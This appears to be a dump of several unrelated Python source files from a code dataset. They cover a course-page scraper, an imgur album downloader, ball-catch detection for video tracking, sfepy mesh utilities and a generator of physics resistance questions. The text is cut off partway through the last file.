opened file for writing\n# writes the html to a file\ndef getPage(browser,file):\n\tbrowser.switch_to_window(browser.window_handles[-1])\n\tpage = browser.page_source\n\tsoup = BeautifulSoup(page,'html.parser')\n\ttry:\n\t\ttest = soup.find(id=\"VAR1\").get_text()\n\t\tif test == '' or test == '\\n':\n\t\t\t#print('No text in fields... (Error Code: 1)')\n\t\t\tbrowser.close()\n\t\t\treturn False\n\texcept:\n\t\t#print('Failed to load correct page... (Error Code: 2)')\n\t\tbrowser.close()\n\t\treturn False\n\t##print(\"Course recorded.\")\n\tfile.write(page)\n\tfile.write('\\n-------\\n')\n\tbrowser.close()\n\treturn True\n\t\n\t\n# writeToFile(l,directory,file)\n# l = list of department codes\n# directory = $PATH_TO_TERM_DIRECTORY - string\n# file = filename - string\n# saves the list, delimited by a '|' to the given file in the given directory\ndef writeToFile(l,directory,file):\n\tif not os.path.exists(os.path.dirname(directory)):\n\t try:\n\t os.makedirs(os.path.dirname(directory))\n\t except:\n\t \treturn False\n\tf = open(directory+file,'w')\n\tfor dept in l:\n\t\tf.write(dept+'|')\n\tf.close()","sub_path":"parsing/pullCourses.py","file_name":"pullCourses.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"217384640","text":"import re\nimport os\n\nfrom libs import *\n\n\nclass ImgurAlbumException(Exception):\n\n def __init__(self, msg=False):\n self.msg = msg\n\n\ndef is_album(url):\n \"\"\"\n Checks if the given URL is actually from a imgur album\n \"\"\"\n match = re.match(ALBUM_URL, url)\n return match\n\n\nclass ImgurAlbum:\n\n def __init__(self, album_url, folder_name):\n \"\"\"\n Constructor. Pass in the URL to the album to download\n \"\"\"\n self.album_url = album_url\n self.folder_name = folder_name\n\n # Callbacks for album download progress\n self.image_start_callbacks = []\n self.image_progress_callbacks = []\n self.image_complete_callbacks = []\n self.album_start_callbacks = []\n self.album_complete_callbacks = []\n\n # Check the URL is a valid imgur album\n match = is_album(album_url)\n if not match:\n raise ImgurAlbumException(\"URL must be a valid Imgur Album\")\n\n # Retrieve album ID\n self.album_key = match.group(4)\n\n\n def on_image_start(self, callback):\n \"\"\"\n Allows binding a function onto the start of the download process of each\n image in the album.\n Callback includes the image URL and the folder path.\n \"\"\"\n self.image_start_callbacks.append(callback)\n\n\n def on_image_progress(self, callback):\n \"\"\"\n Allows binding a function onto the download progress of the gif.\n Callback includes the url, save path, downloaded bytes and total size.\n \"\"\"\n self.image_progress_callbacks.append(callback)\n\n\n def on_image_complete(self, callback):\n \"\"\"\n Allows binding a function to the download complete event of each image in\n the album.\n The callback provides the image URL, save location, a flag to show if the\n image has already been downloaded, the image index and the total number of\n images\n \"\"\"\n self.image_complete_callbacks.append(callback)\n\n\n def on_album_start(self, callback):\n \"\"\"\n Allows binding a function to the start of the album download process.\n The callback includes the album URL and the directory where the album\n is saved.\n \"\"\"\n self.album_start_callbacks.append(callback)\n\n\n def on_album_complete(self, callback):\n \"\"\"\n Allows binding a function to the end of the album download process.\n The callback includes the album URL and the directory where the images\n are saved.\n \"\"\"\n self.album_complete_callbacks.append(callback)\n\n\n def save_images(self, parent_folder):\n \"\"\"\n Saves the images from the album into a folder given by foldername.\n Each album will be stored in a unique sub-directory identified by the album ID\n If the folder doesn't exist, it'll try and create it.\n \"\"\"\n # Run the album_start callbacks:\n for fn in self.album_start_callbacks:\n fn(self.album_url, parent_folder)\n\n # Read the blog version of the page to retrieve all images\n fullListURL = \"http://imgur.com/a/\" + self.album_key + \"/layout/blog\"\n\n # Download HTML data\n self.response = make_request(fullListURL)\n if not self.response:\n return\n\n # Read in the images now so we can get stats and stuff:\n html = self.response.read().decode('utf-8')\n self.image_links = re.findall(ALBUM_SCRAPPER_REGEX, html)\n if len(self.image_links) == 0:\n print_warning(\"No images found in current album\")\n return\n\n # Try and create the album folder:\n album_folder = os.path.join(parent_folder, self.folder_name)\n if not os.path.exists(album_folder):\n os.makedirs(album_folder)\n\n # Loop through and save the images\n for (counter, image) in enumerate(self.image_links, start = 1):\n # Imgur seems to always accept image requests with '.jpg'\n image_url = IMGUR_URL + image + \".jpg\"\n # Download the image\n self.handle_image(image_url, album_folder, counter, len(self.image_links))\n\n # Run the album_complete callbacks:\n for fn in self.album_complete_callbacks:\n fn(self.album_url, album_folder, len(self.image_links))\n\n\n def handle_image(self, image_url, directory, index, total_images):\n \"\"\"\n Download a single image from the provided url and save it in the provided directory\n \"\"\"\n # Prepare the index of each image, padded with '0'\n image_num = len(str(total_images))\n cnt_str = str(index).zfill(image_num)\n # Set the file name for each image\n file_name = \"%s\" % cnt_str\n\n image = Image(image_url, file_name)\n for callback in self.image_start_callbacks:\n image.on_image_start(callback)\n for callback in self.image_progress_callbacks:\n image.on_image_progress(callback)\n for callback in self.image_complete_callbacks:\n image.on_image_complete(callback)\n\n\n image.image_index = index\n image.image_total = total_images\n image.save_image(directory)\n","sub_path":"libs/imgur_album.py","file_name":"imgur_album.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538964832","text":"from typing import Dict, List, Type\n\nfrom src.data.interfaces import StoreRepositoryInterface as StoreRepository\nfrom src.domain.use_cases import FindStores as FindStoresInterface\nfrom src.domain.models import Store\n\n\nclass FindStores(FindStoresInterface):\n \"\"\" Class to define usecase: Find stores \"\"\"\n\n def __init__(self, store_repository: Type[StoreRepository]):\n self.store_repository = store_repository\n\n def search_by_name_or_typestore(self, name: str = None, typestore: str = None) -> Dict[bool, List[Store]]:\n response = None\n validate_entry = all([\n isinstance(name, str) or name is None,\n isinstance(typestore, str) or typestore is None,\n ])\n\n if validate_entry:\n response = self.store_repository.search_by_name_or_typestore(name=name, typestore=typestore)\n\n return {\"success\": validate_entry, \"data\": response}\n","sub_path":"src/data/find_store/find.py","file_name":"find.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"438956614","text":"import cv2\nimport numpy as np\nimport pandas as pd\nimport torch\nimport csv\nimport statistics\nfrom os import path\n\n#Constants\ncurrent_file_name = ''\ncurrent_file_data = None\n\n\n\n#Input Functions for Sample Solution\n\ndef load_labels(file_name, image_width, image_height, frame_number=-1):\n '''\n Author: \n Ziteng Jiao\n\n Parameter:\n file_name: path to the label file. groundtruths.txt\n image_width: the width of image (video frame)\n image_height: the height of image (video frame)\n frame_number: the specific frame number that we want\n if we want the whole label table the this should be -1\n the default value is -1\n Return:\n When frame_number is -1:\n type: pandas DataFrame \n content: all labels\n format: [\"Frame\", \"Class\",\"ID\",\"X\",\"Y\",\"Width\",\"Height\"]\n When frame_number is not -1:\n type: pytorch tensor\n content: coordinates of objects in the requested frame \n empty tensor if the requested frame doesn't exist in the label file\n format: [\"Class\",\"ID\",\"X\",\"Y\",\"Width\",\"Height\"]\n '''\n # data = pd.read_csv(file_name, sep=' ')\n global current_file_name\n global current_file_data\n if not path.exists(file_name):\n print(\"The file\", file_name, \"doesn't exist.\")\n exit(1)\n if file_name != current_file_name:\n current_file_name = file_name\n current_file_data = pd.read_csv(current_file_name, sep=',')\n current_file_data['X'] = current_file_data['X'].apply(lambda x: x*image_width)\n current_file_data['Y'] = current_file_data['Y'].apply(lambda x: x*image_height)\n current_file_data['Width'] = current_file_data['Width'].apply(lambda x: x*image_width)\n current_file_data['Height'] = current_file_data['Height'].apply(lambda x: x*image_height)\n\n if frame_number==-1:\n return current_file_data\n frame = current_file_data[(current_file_data[\"Frame\"]==frame_number)]\n pt_frame = torch.tensor(frame[[\"Class\",\"ID\",\"X\",\"Y\",\"Width\",\"Height\"]].values)\n return pt_frame\n\n\n\n\n\n#Output Functions for Sample Solution\ndef detect_catches(image, bbox_xyxy, classes, ids, frame_num, colorDict, frame_catch_pairs, ball_person_pairs, colorOrder):\n #Create a list of bbox centers and ranges\n bbox_XYranges = bbox_xyxy2XYranges(bbox_xyxy)\n \n\n #Detect the color of each ball and return a dictionary matching id to color\n detected_ball_colors = detect_colors(image, bbox_XYranges, classes, ids, colorDict)\n\n #Detect collison between balls and people\n collisions = detect_collisions(classes, ids, frame_num, bbox_XYranges, detected_ball_colors)\n\n #Update dictionary pairs\n frame_catch_pairs, ball_person_pairs = update_dict_pairs(frame_num, collisions, frame_catch_pairs, ball_person_pairs, colorOrder)\n bbox_strings = format_bbox_strings(ids, classes, detected_ball_colors, collisions)\n\n return (bbox_strings, frame_catch_pairs, ball_person_pairs)\n\n\ndef detect_colors(image, bbox_XYranges, classes, ids, colorDict):\n detected_ball_colors = {}\n bbox_offset = 5\n\n for i in range(len(classes)):\n\n #Checks if the class is a ball (1)\n if (classes[i] == 1): \n #Extract region of interest HSV values\n #Image values are (height, width, colorchannels)\n X = bbox_XYranges[i][0]\n Y = bbox_XYranges[i][1]\n roi_bgr = image[(Y - bbox_offset):(Y + bbox_offset), (X - bbox_offset):(X + bbox_offset)]\n\n\n #Convert BGR image to HSV image\n roi_hsv = cv2.cvtColor(roi_bgr, cv2.COLOR_BGR2HSV)\n hue = np.mean(roi_hsv[:,:,0])\n sat = np.mean(roi_hsv[:,:,1])\n val = np.mean(roi_hsv[:,:,2])\n ball_color = (hue, sat, val)\n\n\n #Check if the color is in a specified range\n for color in colorDict:\n upper = colorDict[color][0]\n lower = colorDict[color][1]\n\n if (ball_color <= upper) :\n if (ball_color >= lower) :\n detected_ball_colors[ids[i]] = [color, bbox_XYranges[i][0], bbox_XYranges[i][1]]\n break\n\n return detected_ball_colors\n\n\ndef bbox_xyxy2XYranges(bbox_xyxy):\n bbox_XYranges = []\n\n #Create list of bbox centers and ranges\n for box in bbox_xyxy:\n #Get bbox corners\n xmin = int(box[0])\n ymin = int(box[1])\n xmax = int(box[2])\n ymax = int(box[3])\n\n #Get center of bounding box\n X = int(((xmax - xmin) / 2) + xmin)\n Y = int(((ymax - ymin) / 2) + ymin)\n\n #Create a range for collison detection\n X_range = (X - ((xmax - xmin) / 2), X + ((xmax - xmin) / 2))\n Y_range = (Y - ((ymax - ymin) / 2), Y + ((ymax - ymin) / 2))\n\n bbox_XYranges.append([X, Y, X_range, Y_range])\n\n return bbox_XYranges\n\n\ndef format_bbox_strings(ids, classes, detected_ball_colors, collisions):\n bbox_strings = [None] * len(classes)\n\n for i in range(len(classes)):\n #Person bbox info\n if (ids[i] in collisions):\n color = collisions[ids[i]]\n txt = 'Holding {color}'.format(color = color)\n\n #Ball bbox info \n elif (ids[i] in detected_ball_colors):\n color = detected_ball_colors[ids[i]][0]\n txt = 'Detected {color}'.format(color = color)\n\n else:\n txt = ''\n\n bbox_strings[i] = txt\n\n return bbox_strings\n\n\ndef detect_collisions(classes, ids, frame_num, bbox_XYranges, detected_ball_colors):\n #collisions = {'id' : color, ....}\n collisions = {}\n #maxId = value after maxID is likely not tracked correctly\n maxId = 8\n\n for i in range(len(classes)):\n #Check if a person\n if ((classes[i] == 0) and (ids[i] < maxId)):\n\n #Get persons bbox range\n person_X_range = bbox_XYranges[i][2]\n person_Y_range = bbox_XYranges[i][3]\n\n #Check if the center of a ball is in a persons bounding box\n #detected_ball_colors = {'id' : [color, X, Y], ...}\n for ball in detected_ball_colors:\n ball_color = detected_ball_colors[ball][0]\n ball_X = detected_ball_colors[ball][1]\n ball_Y = detected_ball_colors[ball][2]\n\n if (ball_X >= person_X_range[0] and ball_X <= person_X_range[1] and ball_Y >= person_Y_range[0] and ball_Y <= person_Y_range[1] and (ball_color not in collisions.values())):\n collisions[ids[i]] = ball_color\n break\n\n return collisions\n\n\ndef update_dict_pairs(frame_num, collisions, frame_catch_pairs, ball_person_pairs, colorOrder):\n updateFrames = 0\n\n for person in collisions:\n color = collisions[person]\n tmp = {}\n #Ball color has not been held yet\n if (color not in ball_person_pairs):\n ball_person_pairs[color] = person\n\n #Ball is held by a new person \n elif (ball_person_pairs[color] != person):\n ball_person_pairs[color] = person\n updateFrames = 1\n\n if (updateFrames):\n tmp = ''\n for color in colorOrder:\n tmp = tmp + str(ball_person_pairs[color]) + ' '\n frame_catch_pairs.append([frame_num, tmp])\n\n return (frame_catch_pairs, ball_person_pairs)\n\n\ndef write_catches(output_path, frame_catch_pairs, colorOrder):\n colorOrder.insert(0, \"frame\")\n with open(output_path, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',', quotechar=' ', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(colorOrder)\n frame_catch_pairs = smooth_frame_pairs(frame_catch_pairs)\n for i in range(len(frame_catch_pairs)):\n frame = frame_catch_pairs[i][0]\n pairs = frame_catch_pairs[i][1].split(' ')\n pairs.insert(0, frame)\n writer.writerow(pairs)\n\n return\n \n \ndef smooth_frame_pairs(frame_catch_pairs):\n max_diff = 5 \n size = len(frame_catch_pairs)\n smooth_pairs = []\n\n i = 0\n while i < size:\n frame = frame_catch_pairs[i][0]\n\n #Check if next item is in range\n if((i+1) < size):\n diff = frame_catch_pairs[i+1][0] - frame\n\n #Check if next frame is close\n if(diff < max_diff):\n color_ids = [[],[],[],[],[],[]]\n tmp_frames = frame_catch_pairs[i:]\n nxt_i = i\n\n for cur_frame in tmp_frames:\n cur_ids = cur_frame[1][:-1]\n cur_ids = cur_ids.split(' ')\n cur_dif = cur_frame[0] - frame\n\n if(cur_dif < max_diff):\n for k in range(len(cur_ids)):\n color_ids[k].append(cur_ids[k])\n nxt_i = nxt_i + 1\n else:\n break\n \n tmp = ''\n for j in range(len(color_ids)):\n mode = statistics.mode(color_ids[j])\n tmp = tmp + mode + ' '\n \n i = nxt_i\n smooth_pairs.append([frame,tmp]) \n else:\n smooth_pairs.append(frame_catch_pairs[i])\n i = i + 1\n\n else:\n smooth_pairs.append(frame_catch_pairs[i])\n i = i + 1\n\n return smooth_pairs\n\n\n\n\n\n\n\n","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"98027707","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimg = cv2.imread('j.png',0)\nkernel = np.ones((5,5),np.uint8)\nprint(kernel)\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n\nplt.subplot(121), plt.imshow(img), plt.title('Original')\nplt.xticks([]), plt.yticks([])\nplt.subplot(122), plt.imshow(opening), plt.title('Opening')\nplt.xticks([]), plt.yticks([])\nplt.show()","sub_path":"ImageProcesscing/MorphologicalTransformation/Openning.py","file_name":"Openning.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"558812911","text":"# -*- coding: utf-8 -*-\n\nfrom ..settings.settings import NUMBER_OF_SPIDERS\nfrom .all_pipelines import ALL_PIPELINES\n\nclass TransformData(object):\n def process_item(self, item, spider):\n for counter in range(1, NUMBER_OF_SPIDERS + 1):\n if type(spider).__name__ == f'Spider{counter}':\n ALL_PIPELINES[f'spider{counter}'](item)\n return item\n","sub_path":"main/data_pipelines/TransformData.py","file_name":"TransformData.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"250644883","text":"import numpy as nm\n\nimport sfepy.linalg as la\nfrom extmods.mappings import CSurfaceMapping\n\ndef prepare_remap(indices, n_full):\n \"\"\"\n Prepare vector for remapping range `[0, n_full]` to its subset given\n by `indices`.\n \"\"\"\n remap = nm.empty((n_full,), dtype=nm.int32)\n remap.fill(-1)\n remap[indices] = nm.arange(indices.shape[0], dtype=nm.int32)\n\n return remap\n\ndef invert_remap(remap):\n \"\"\"\n Return the inverse of `remap`, i.e. a mapping from a sub-range\n indices to a full range, see :func:`prepare_remap()`.\n \"\"\"\n if remap is not None:\n inverse = nm.where(remap >= 0)[0].astype(nm.int32)\n\n else:\n inverse = None\n\n return inverse\n\ndef compute_nodal_normals(nodes, region, field, return_imap=False):\n \"\"\"Nodal normals are computed by simple averaging of element normals of\n elements every node is contained in. \"\"\"\n dim = field.shape[0]\n\n region.select_cells_of_surface()\n\n normals = nm.zeros( (nodes.shape[0], dim),\n dtype = nm.float64 )\n mask = nm.zeros( (nodes.max()+1,), dtype = nm.int32 )\n imap = nm.empty_like( mask )\n imap.fill( nodes.shape[0] ) # out-of-range index for normals.\n imap[nodes] = nm.arange( nodes.shape[0], dtype = nm.int32 )\n \n for ig, fis in region.fis.iteritems():\n ap = field.aps[ig]\n n_fa = fis.shape[0]\n n_fp = ap.efaces.shape[1]\n face_type = 's%d' % n_fp\n\n faces = ap.efaces[fis[:,1]]\n ee = ap.econn[fis[:,0]]\n econn = nm.empty( faces.shape, dtype = nm.int32 )\n for ir, face in enumerate( faces ):\n econn[ir] = ee[ir,face]\n mask[econn] += 1\n # Unit normals -> weights = ones.\n ps = ap.interp.poly_spaces[face_type]\n weights = nm.ones((n_fp,), dtype=nm.float64)\n\n coors = ps.node_coors\n bf_sg = ps.eval_base(coors, diff=True)\n\n cmap = CSurfaceMapping(n_fa, n_fp, dim, n_fp)\n cmap.describe(field.get_coor(), econn, bf_sg, weights)\n\n e_normals = cmap.normal.squeeze()\n\n # normals[imap[econn]] += e_normals\n im = imap[econn]\n for ii, en in enumerate( e_normals ):\n normals[im[ii]] += en\n\n # All nodes must have a normal.\n if not nm.all( mask[nodes] > 0 ):\n raise ValueError( 'region %s has not complete faces!' % region.name )\n\n normals /= la.norm_l2_along_axis( normals )[:,nm.newaxis]\n\n if return_imap:\n return normals, imap\n\n else:\n return normals\n\ndef extend_cell_data( data, domain, rname, val = None ):\n \"\"\"Extend cell data defined in a region rname to the whole domain using the\n value val, or the smallest value in data if val is None.\"\"\"\n n_el = domain.shape.n_el\n if data.shape[0] == n_el: return data\n\n if val is None:\n if data.shape[2] > 1: # Vector.\n val = nm.amin( nm.abs( data ) )\n else: # Scalar.\n val = nm.amin( data )\n\n edata = nm.empty( (n_el,) + data.shape[1:], dtype = nm.float64 )\n edata.fill( val )\n\n region = domain.regions[rname]\n offs = region.get_cell_offsets()\n eoffs = domain.get_cell_offsets()\n## print offs\n## print eoffs\n## print domain.mat_ids_to_i_gs\n## pause()\n\n for group in domain.iter_groups():\n ig = group.ig\n ii = eoffs[ig]\n if ig in region.igs:\n n_cell = region.shape[ig].n_cell\n ir = offs[ig]\n edata[ii+region.cells[ig]] = data[ir:ir+n_cell]\n return edata\n\ndef refine_mesh(filename, level):\n \"\"\"\n Uniformly refine `level`-times a mesh given by `filename`.\n\n The refined mesh is saved to a file with name constructed from base\n name of `filename` and `level`-times appended `'_r'` suffix.\n\n Parameters\n ----------\n filename : str\n The mesh file name.\n level : int\n The refinement level.\n \"\"\"\n import os\n from sfepy.base.base import output\n from sfepy.fem import Mesh, Domain\n\n if level > 0:\n mesh = Mesh.from_file(filename)\n domain = Domain(mesh.name, mesh)\n for ii in range(level):\n output('refine %d...' % ii)\n domain = domain.refine()\n output('... %d nodes %d elements'\n % (domain.shape.n_nod, domain.shape.n_el))\n\n suffix = os.path.splitext(filename)[1]\n filename = domain.name + suffix\n\n domain.mesh.write(filename, io='auto')\n\n return filename\n\n","sub_path":"sfepy/fem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"476958279","text":"from sympy import *\nimport random\nimport numpy as np\n\nfrom qagen.qagen import *\nfrom qagen import utils\nfrom qagen import unit_test_for_user as user_test\n\nclass QA_constraint(QAGen):\n\n def __init__(self):\n '''\n Initializer for your QA question.\n '''\n super().__init__()\n self.author = 'Max Augustine'\n self.description = 'Consider a cable that is l = 3000000 m long. The conductor in this cable consists of x = 10 copper wires, each of diameter d = 0.001 m, bundled together and surrounded by an insulating sheath. The resistivity of copper is p = 3.0 \\\\cdot 10^{-8} Ωm. Calculate the resistance of the conductor in terms of l, d, p, and x'\n\n # keywords about the question that could help to make this more searchable in the future\n self.keywords = ['Physics', 'Electricity and Magnetism', 'E&M', 'resistance']\n self.use_latex = True\n\n def seed_all(self,seed):\n '''\n Write the seeding functions of the libraries that you are using.\n Its important to seed all the libraries you are using because the\n framework will assume it can seed stuff for you. It needs this for\n the library to work.\n '''\n random.seed(seed)\n np.random.seed(seed)\n self.fake.random.seed(seed)\n\n\n def init_consistent_qa_variables(self):\n \"\"\"\n Defines and returns all the variables that need to be consistent\n between a question and an answer. Usually only names and variable/symbol\n names.\n Example: when generating MC questions the non consistent variables will\n be used to generate other options. However, the names, symbols, etc\n should remain consistent otherwise some answers will be obviously fake.\n Note: debug flag can be used to deterministically output a QA that has\n simple numbers to check the correctness of your QA.\n \"\"\"\n\n if self.debug:\n l, x,d,p = symbols('l x d p')\n else:\n l,x,d,p = self.get_symbols(4)\n\n return l,x,d,p\n\n def init_qa_variables(self):\n '''\n Defines and returns all the variables that can vary between a\n question and an answer. Good examples are numerical values that might\n make the answers not obviously wrong.\n Example: when generating MC questions the non consistent variables will\n be used to generate other options. However, the names, symbols, etc\n should remain consistent otherwise some answers will be obviously fake.\n Numerical values that have been fully evaluated are a good example of\n how multiple choice answers can be generated.\n Note: debug flag can be used to deterministically output a QA that has\n simple numbers to check the correctness of your QA.\n '''\n if self.debug:\n l_val, x_val, d_val, diameter_radius, p_val, diameter = 3000000, 10, .001, 1, 0.00000003, 'diameter'\n else:\n l_val = np.random.randint(1, 1000000)\n x_val = np.random.randint(1,100)\n d_val = np.random.randint(1, 5000)/100000\n diameter_radius = np.random.randint(1,100)\n p_val = np.random.randint(2000,5000)/100000000000\n if diameter_radius > 50:\n d_val = d_val/2\n diameter = 'radius'\n else:\n diameter = 'diameter'\n\n\n return l_val, x_val, d_val, diameter_radius, p_val, diameter\n\n def Q(s, l_val, x_val, d_val, diameter_radius, p_val, diameter, l,x,d,p):\n '''\n Important Note: first variables are the not consistent variables followed\n by the consistent ones. See sample QA example if you need too.\n '''\n seqg, perg, choiceg = s.seqg, s.perg, s.choiceg\n\n Consider = choiceg('Consider', 'There is', 'Let there be', 'Consider for a moment', 'Consider the existence of')\n length_eq = Eq(l, l_val)\n long = choiceg('in length', 'long')\n thats = choiceg('that is', '''that's''', 'which is')\n whose = choiceg('whose length is', 'with a length of', 'traversing a distance of','that traverses a distance of')\n\n\n a0 = seqg(Consider, 'a cable',thats,length_eq,'m long.')\n a1 = seqg('{0} a cable {3} {1} m {2}.'.format(Consider, length_eq, long, thats))\n a2 = seqg('A cable is {0} m {1}.'.format(length_eq, long))\n a3 = seqg('{0} a cable {1} {2} m.'.format(Consider, whose, length_eq))\n a4 = seqg('{0} a long cable {1} {2} m.'.format(Consider, whose, length_eq))\n a5 = seqg('{0} a long cable {2} {1} m.'.format(Consider, length_eq, thats))\n a6 = seqg('A long cable is {0} m.'.format(length_eq))\n a_part = choiceg(a0, a1,a2,a3,a4,a5,a6)\n\n x_eq = Eq(x, x_val)\n d_eq = Eq(d, d_val)\n conductor = choiceg('there is', 'there lies', 'consider there being', '''there's''','resides')\n\n each = choiceg('each of','', 'and each has a', 'and each contains a','and each consists of a', 'each one having', 'each having','each containing','each consisting of','each of which having','each of which consisting of', 'each of which contains')\n\n b0 = seqg('The conductor in this cable consists of',x_eq,'copper wires,',each,diameter,d_eq,'m, bundled together and surrounded by an insulating sheath.')\n b1 = seqg('The conductor in this cable consists of {0} copper wires, {3} {1} {2} m, bundled together and surrounded by an insulating sheath.'.format(x_eq, diameter, d_eq, each))\n b2 = seqg('In the cable {3} a conductor which consists of {0} copper wires, {3} {1} {2} m, bundled together and surrounded by an insulating sheath.'.format(x_eq, diameter, d_eq, conductor, each))\n b3 = seqg('Built into the cable is a conductor which consists of {0} copper wires, {3} {1} {2} m, bundled together and surrounded by an insulating sheath.'.format(x_eq, diameter, d_eq, each))\n b4 = seqg('The conductor in this cable consists of an insulating sheath that surrounds {0} copper wires, {3} {1} {2} m,'.format(x_eq, diameter, d_eq, each))\n b5 = seqg('In the cable {3} a conductor which consists of an insulating sheath that surrounding {0} copper wires, {3} {1} {2} m.'.format(x_eq, diameter, d_eq, conductor, each))\n b6 = seqg('Built into the cable is a conductor which consists of an insulating sheath that surrounds {0} copper wires, {3} {1} {2} m.'.format(x_eq, diameter, d_eq, each))\n b_part = choiceg(b0,b1,b2,b3,b4,b5,b6)\n\n p_eq = Eq(p, p_val)\n c0 = seqg('The resistivity of copper is',p_eq,'Ωm.')\n c1 = seqg('''The copper's resistivity is''',p_eq,'Ωm.')\n c2 = seqg(p_eq, 'Ωm is the resistivity of copper.')\n c3 = seqg(p_eq, '''Ωm is the copper's resistivity.''')\n c4 = seqg('Take the resistivity of copper as being', p_eq, 'Ωm.')\n c5 = seqg('''Take the copper's resistivity as being''', p_eq, 'Ωm.')\n c6 = seqg('Use',p_eq, 'Ωm as the resistivity of the copper.')\n c7 = seqg('Use',p_eq, '''Ωm as the copper's resistivity.''')\n c_part = choiceg(c0,c1,c2,c3,c4,c5,c6,c7)\n\n Calculate = choiceg('Calculate', 'Compute', 'Find', 'Find a numerical answer for')\n calculate = choiceg('calculate', 'compute', 'find', 'find a numerical answer for')\n\n ll = str(l)\n xx = str(x)\n dd = str(d)\n pp = str(p)\n\n terms1 = seqg(perg(ll + ',', dd + ',', pp + ','), 'and', xx)\n terms2 = seqg(perg(ll + ',', dd + ',', xx + ','), 'and', pp)\n terms3 = seqg(perg(ll + ',', xx + ',', pp + ','), 'and', dd)\n terms4 = seqg(perg(xx + ',', dd + ',', pp + ','), 'and', ll)\n terms = choiceg(terms1, terms2, terms3, terms4)\n\n d0 = seqg(Calculate,'the resistance of the conductor in terms of', terms)\n d1 = seqg('''{0} the conductor's resistance in terms of {1}.'''.format(Calculate, terms))\n d2 = seqg('{0} the resistance of the conductor in the cable in terms of {1}.'.format(Calculate,terms))\n d3 = seqg('In terms of {0} {1} the resistance of the conductor.'.format(terms, calculate))\n d4 = seqg('''In terms of {0} {1} the conductor's resistance.'''.format(terms, calculate))\n d5 = seqg('In terms of {0} {1} the resistance of the conductor in the cable.'.format(terms,calculate))\n\n d_part = choiceg(d0,d1,d2,d3,d4,d5)\n\n q = seqg(a_part, b_part, c_part, d_part)\n\n return q\n\n def A(s, l_val, x_val, d_val, diameter_radius, p_val, diameter, l,x,d,p):\n '''\n Important Note: first variables are the not consistent variables followed\n by the consistent ones. See sample QA example if you need too.\n '''\n seqg, perg, choiceg = s.seqg, s.perg, s.choiceg\n\n R = symbols('R')\n pi = np.pi\n if diameter == 'diameter':\n A = pi*((d/2)**2)\n else:\n A = pi*(d**2)\n\n Eq(1/R, x*A/(p*l))\n res1 = Eq(R, (p*l)/(x*A))\n res2 = Eq((p*l)/(x*A), R)\n resistance = choiceg(res1,res2)\n\n iis = choiceg('is', 'is equal to', 'equals')\n eq_resist = choiceg('', 'equivalent resistance', 'resistance')\n\n ll = str(l)\n xx = str(x)\n dd = str(d)\n pp = str(p)\n \n terms1 = seqg(perg(ll + ',', dd + ',', pp + ','), 'and', xx)\n terms2 = seqg(perg(ll + ',', dd + ',', xx + ','), 'and', pp)\n terms3 = seqg(perg(ll + ',', xx + ',', pp + ','), 'and', dd)\n terms4 = seqg(perg(xx + ',', dd + ',', pp + ','), 'and', ll)\n terms = choiceg(terms1, terms2, terms3, terms4)\n\n a0 = seqg(resistance, 'is the',eq_resist,'of the conductor in terms of', terms)\n a1 = seqg('''{0} is the conductor's {1} in terms of {2}.'''.format(resistance, eq_resist, terms))\n a2 = seqg(resistance, 'is the',eq_resist,'of the conductor in the cable in terms of',terms)\n a3 = seqg('The',eq_resist,'of the conductor', iis, resistance)\n a4 = seqg('''The conductor's''',eq_resist,iis, resistance)\n a5 = seqg('The', eq_resist,'of the conductor in the cable',iis, resistance)\n a6 = seqg('In terms of',terms,'the',eq_resist,'of the conductor',iis,resistance)\n a7 = seqg('In terms of',terms,resistance,iis,'the',eq_resist,'of the conductor.')\n\n\n a = choiceg(a0, a1, a2, a3, a4, a5,a6,a7)\n return a\n\n ##\n\n def get_qa(self,seed):\n '''\n Example of how Q,A are formed in general.\n '''\n # set seed\n self.seed_all(seed)\n # get variables for qa and register them for the current q,a\n variables, variables_consistent = self._create_all_variables()\n # get concrete qa strings\n q_str = self.Q(*variables,*variables_consistent)\n a_str = self.A(*variables,*variables_consistent)\n return q_str, a_str\n\n## Some helper functions to check the formats are coming out correctly\n\n##\n\ndef check_single_question_debug(qagenerator):\n '''\n Checks by printing a single quesiton on debug mode\n '''\n qagenerator.debug = True\n q,a = qagenerator.get_qa(seed=1)\n print('qagenerator.debug = ', qagenerator.debug)\n print('q: ', q)\n print('a: ', a)\n\ndef check_single_question(qagenerator):\n '''\n Checks by printing a single quesiton on debug mode\n '''\n q,a = qagenerator.get_qa(seed=random.randint(0,1000))\n print('qagenerator.debug = ', qagenerator.debug)\n print('q: ', q)\n print('a: ', a)\n\ndef check_mc(qagenerator):\n '''\n Checks by printing the MC(Multiple Choice) option\n '''\n nb_answers_choices = 10\n for seed in range(3):\n #seed = random.randint(0,100)\n q_str, ans_list = qagenerator.generate_single_qa_MC(nb_answers_choices=nb_answers_choices,seed=seed)\n print('\\n-------seed-------: ',seed)\n print('q_str:\\n',q_str)\n print('-answers:')\n print(\"\\n\".join(ans_list))\n\ndef check_many_to_many(qagenerator):\n for seed in range(3):\n q,a = qagenerator.generate_many_to_many(nb_questions=4,nb_answers=3,seed=seed)\n print('-questions:')\n print(\"\\n\".join(q))\n print('-answers:')\n print(\"\\n\".join(a))\n\ndef check_many_to_one_consis(qagenerator):\n for seed in range(3):\n print()\n q,a = qagenerator.generate_many_to_one(nb_questions=5,seed=seed)\n 